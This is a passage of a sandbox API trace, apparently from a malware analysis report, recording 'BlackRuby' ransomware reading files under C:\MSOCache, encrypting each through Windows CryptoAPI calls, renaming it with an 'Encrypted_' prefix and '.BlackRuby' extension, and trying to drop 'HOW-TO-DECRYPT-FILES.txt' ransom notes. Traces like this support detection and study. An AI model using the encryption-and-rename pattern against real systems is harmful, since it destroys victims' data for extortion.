Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.874] GetLastError () returned 0x5 [0046.874] SetErrorMode (uMode=0x1) returned 0x0 [0046.874] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.874] GetLastError () returned 0x5 [0046.874] SetErrorMode (uMode=0x0) returned 0x1 [0046.875] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUISet.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUISet.xml", lpFilePart=0x0) returned 0x4f [0046.875] GetLastError () returned 0x5 [0046.875] SetErrorMode (uMode=0x1) returned 0x0 [0046.875] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\officemuiset.xml"), fInfoLevelId=0x0, lpFileInformation=0x1ce14e0 | out: lpFileInformation=0x1ce14e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x2f8a0e20, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x333)) returned 1 [0046.875] GetLastError () returned 0x5 [0046.875] SetErrorMode (uMode=0x0) returned 0x1 [0046.875] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUISet.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUISet.xml", lpFilePart=0x0) returned 0x4f [0046.875] GetLastError () returned 0x5 [0046.875] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUISet.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUISet.xml", lpFilePart=0x0) returned 0x4f [0046.875] GetLastError () returned 0x5 [0046.875] SetErrorMode (uMode=0x1) returned 0x0 [0046.875] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.875] GetLastError () returned 0x0 [0046.875] GetFileType (hFile=0x184) returned 0x1 [0046.875] SetErrorMode (uMode=0x0) returned 0x1 [0046.875] GetFileType (hFile=0x184) returned 0x1 [0046.875] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x333 [0046.875] GetLastError () returned 0x0 [0046.875] ReadFile (in: hFile=0x184, lpBuffer=0x1ce3568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1ce3568*, lpNumberOfBytesRead=0x18ed84*=0x333, lpOverlapped=0x0) returned 1 [0046.885] GetLastError () returned 0x0 [0046.885] CloseHandle (hObject=0x184) returned 1 [0046.885] GetLastError () returned 0x0 [0046.885] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUISet.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUISet.xml", lpFilePart=0x0) returned 0x4f [0046.885] GetLastError () returned 0x0 [0046.885] SetErrorMode (uMode=0x1) returned 0x0 [0046.885] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\officemuiset.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x2f8a0e20, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x333)) returned 1 [0046.885] GetLastError () returned 0x0 [0046.885] SetErrorMode (uMode=0x0) returned 0x1 [0046.885] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c4e8) returned 1 [0046.885] GetLastError () returned 0x0 [0046.921] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1b401e0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x3609e0) returned 1 [0046.921] GetLastError () returned 0x0 [0046.921] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.921] GetLastError () returned 0x0 [0046.926] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.926] GetLastError () returned 0x0 [0046.926] CryptDuplicateKey (in: hKey=0x3609e0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360ea0) returned 1 [0046.926] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.926] GetLastError () returned 0x0 [0046.926] CryptSetKeyParam (hKey=0x360ea0, dwParam=0x4, pbData=0x1b6d22c*=0x1, dwFlags=0x0) returned 1 [0046.926] GetLastError () returned 0x0 [0046.926] CryptSetKeyParam (hKey=0x360ea0, dwParam=0x1, pbData=0x1b6d1f8, dwFlags=0x0) returned 1 [0046.926] GetLastError () returned 0x0 [0046.926] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b6d274*, pdwDataLen=0x18ed74*=0x430, dwBufLen=0x430 | out: pbData=0x1b6d274*, pdwDataLen=0x18ed74*=0x430) returned 1 [0046.926] GetLastError () returned 0x0 [0046.926] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b6db00*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1b6db00*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0046.926] GetLastError () returned 0x0 [0046.926] CryptEncrypt (in: hKey=0x360ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b6db30*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1b6db30*, pdwDataLen=0x18ed94*=0x10) returned 1 [0046.926] GetLastError () returned 0x0 [0046.926] CryptDestroyKey (hKey=0x3609e0) returned 1 [0046.926] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0046.926] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0046.926] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUISet.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUISet.xml", lpFilePart=0x0) returned 0x4f [0046.926] GetLastError () returned 0x0 [0046.927] SetErrorMode (uMode=0x1) returned 0x0 [0046.927] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.927] GetLastError () returned 0xb7 [0046.927] GetFileType (hFile=0x184) returned 0x1 [0046.927] SetErrorMode (uMode=0x0) returned 0x1 [0046.927] GetFileType (hFile=0x184) returned 0x1 [0046.929] CloseHandle (hObject=0x184) returned 1 [0046.929] GetLastError () returned 0xb7 [0046.929] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUISet.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUISet.xml", lpFilePart=0x0) returned 0x4f [0046.929] GetLastError () returned 0xb7 [0046.929] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Encrypted_Ck5cGyzAcaR9NNVCr6FJAGv3KmpbX8Tv6H6F6ucG.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Encrypted_Ck5cGyzAcaR9NNVCr6FJAGv3KmpbX8Tv6H6F6ucG.BlackRuby", lpFilePart=0x0) returned 0x7b [0046.929] GetLastError () returned 0xb7 [0046.929] SetErrorMode (uMode=0x1) returned 0x0 [0046.929] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\officemuiset.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x242dbac0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x440)) returned 1 [0046.929] GetLastError () returned 0xb7 [0046.929] SetErrorMode (uMode=0x0) returned 0x1 [0046.929] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\officemuiset.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Encrypted_Ck5cGyzAcaR9NNVCr6FJAGv3KmpbX8Tv6H6F6ucG.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\encrypted_ck5cgyzacar9nnvcr6fjagv3kmpbx8tv6h6f6ucg.blackruby")) returned 1 [0046.930] GetLastError () returned 0xb7 [0046.930] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.930] GetLastError () returned 0xb7 [0046.930] SetErrorMode (uMode=0x1) returned 0x0 [0046.930] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.930] GetLastError () returned 0x5 [0046.931] SetErrorMode (uMode=0x0) returned 0x1 [0046.931] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\osetupui.dll", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\osetupui.dll", lpFilePart=0x0) returned 0x4b [0046.931] GetLastError () returned 0x5 [0046.931] SetErrorMode (uMode=0x1) returned 0x0 [0046.931] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\osetupui.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b8cd20 | out: lpFileInformation=0x1b8cd20*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc8b16200, ftCreationTime.dwHighDateTime=0x1cac190, ftLastAccessTime.dwLowDateTime=0xc8b16200, ftLastAccessTime.dwHighDateTime=0x1cac190, ftLastWriteTime.dwLowDateTime=0x30e7f070, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x2ed80)) returned 1 [0046.931] GetLastError () returned 0x5 [0046.931] SetErrorMode (uMode=0x0) returned 0x1 [0046.932] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.932] GetLastError () returned 0x5 [0046.932] SetErrorMode (uMode=0x1) returned 0x0 [0046.932] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.932] GetLastError () returned 0x5 [0046.933] SetErrorMode (uMode=0x0) returned 0x1 [0046.933] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\pss10r.chm", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\pss10r.chm", lpFilePart=0x0) returned 0x49 [0046.933] GetLastError () returned 0x5 [0046.933] SetErrorMode (uMode=0x1) returned 0x0 [0046.933] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\pss10r.chm"), fInfoLevelId=0x0, lpFileInformation=0x1baad84 | out: lpFileInformation=0x1baad84*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x77cbb000, ftCreationTime.dwHighDateTime=0x1cac57a, ftLastAccessTime.dwLowDateTime=0x77cbb000, ftLastAccessTime.dwHighDateTime=0x1cac57a, ftLastWriteTime.dwLowDateTime=0x30ea6170, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x6a3b)) returned 1 [0046.934] GetLastError () returned 0x5 [0046.934] SetErrorMode (uMode=0x0) returned 0x1 [0046.934] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.934] GetLastError () returned 0x5 [0046.934] SetErrorMode (uMode=0x1) returned 0x0 [0046.934] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.934] GetLastError () returned 0x5 [0046.935] SetErrorMode (uMode=0x0) returned 0x1 [0046.936] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\setup.chm", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\setup.chm", lpFilePart=0x0) returned 0x48 [0046.936] GetLastError () returned 0x5 [0046.936] SetErrorMode (uMode=0x1) returned 0x0 [0046.936] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\setup.chm"), fInfoLevelId=0x0, lpFileInformation=0x1bc8ddc | out: lpFileInformation=0x1bc8ddc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cab9f00, ftCreationTime.dwHighDateTime=0x1cac8ad, ftLastAccessTime.dwLowDateTime=0x7cab9f00, ftLastAccessTime.dwHighDateTime=0x1cac8ad, ftLastWriteTime.dwLowDateTime=0x30ea6170, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x10676)) returned 1 [0046.936] GetLastError () returned 0x5 [0046.936] SetErrorMode (uMode=0x0) returned 0x1 [0046.936] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.936] GetLastError () returned 0x5 [0046.936] SetErrorMode (uMode=0x1) returned 0x0 [0046.936] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.936] GetLastError () returned 0x5 [0046.937] SetErrorMode (uMode=0x0) returned 0x1 [0046.938] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.938] GetLastError () returned 0x5 [0046.938] SetErrorMode (uMode=0x1) returned 0x0 [0046.938] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x1be6e2c | out: lpFileInformation=0x1be6e2c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2c210800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2c210800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x30ea6170, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x257e)) returned 1 [0046.938] GetLastError () returned 0x5 [0046.938] SetErrorMode (uMode=0x0) returned 0x1 [0046.938] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.938] GetLastError () returned 0x5 [0046.938] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.938] GetLastError () returned 0x5 [0046.938] SetErrorMode (uMode=0x1) returned 0x0 [0046.938] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.938] GetLastError () returned 0x0 [0046.938] GetFileType (hFile=0x184) returned 0x1 [0046.938] SetErrorMode (uMode=0x0) returned 0x1 [0046.938] GetFileType (hFile=0x184) returned 0x1 [0046.938] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x257e [0046.938] GetLastError () returned 0x0 [0046.938] ReadFile (in: hFile=0x184, lpBuffer=0x1be8f2c, nNumberOfBytesToRead=0x257e, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1be8f2c*, lpNumberOfBytesRead=0x18ed84*=0x257e, lpOverlapped=0x0) returned 1 [0046.949] GetLastError () returned 0x0 [0046.949] CloseHandle (hObject=0x184) returned 1 [0046.949] GetLastError () returned 0x0 [0046.949] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.949] GetLastError () returned 0x0 [0046.949] SetErrorMode (uMode=0x1) returned 0x0 [0046.949] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2c210800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2c210800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x30ea6170, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x257e)) returned 1 [0046.949] GetLastError () returned 0x0 [0046.949] SetErrorMode (uMode=0x0) returned 0x1 [0046.949] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c680) returned 1 [0046.949] GetLastError () returned 0x0 [0046.983] CryptImportKey (in: hProv=0x37c680, pbData=0x1c47e04, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360ce0) returned 1 [0046.983] GetLastError () returned 0x0 [0046.983] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.983] GetLastError () returned 0x0 [0046.988] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.988] GetLastError () returned 0x0 [0046.988] CryptDuplicateKey (in: hKey=0x360ce0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360f60) returned 1 [0046.988] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.988] GetLastError () returned 0x0 [0046.988] CryptSetKeyParam (hKey=0x360f60, dwParam=0x4, pbData=0x1c74e50*=0x1, dwFlags=0x0) returned 1 [0046.988] GetLastError () returned 0x0 [0046.988] CryptSetKeyParam (hKey=0x360f60, dwParam=0x1, pbData=0x1c74e1c, dwFlags=0x0) returned 1 [0046.988] GetLastError () returned 0x0 [0046.988] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c74e98*, pdwDataLen=0x18ed74*=0x2670, dwBufLen=0x2670 | out: pbData=0x1c74e98*, pdwDataLen=0x18ed74*=0x2670) returned 1 [0046.988] GetLastError () returned 0x0 [0046.988] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c79ba4*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c79ba4*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0046.988] GetLastError () returned 0x0 [0046.988] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c79bd4*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c79bd4*, pdwDataLen=0x18ed94*=0x10) returned 1 [0046.988] GetLastError () returned 0x0 [0046.988] CryptDestroyKey (hKey=0x360ce0) returned 1 [0046.988] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.988] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.989] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.989] GetLastError () returned 0x0 [0046.989] SetErrorMode (uMode=0x1) returned 0x0 [0046.989] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.990] GetLastError () returned 0xb7 [0046.990] GetFileType (hFile=0x184) returned 0x1 [0046.990] SetErrorMode (uMode=0x0) returned 0x1 [0046.990] GetFileType (hFile=0x184) returned 0x1 [0046.991] CloseHandle (hObject=0x184) returned 1 [0046.991] GetLastError () returned 0xb7 [0046.991] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.991] GetLastError () returned 0xb7 [0046.991] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All 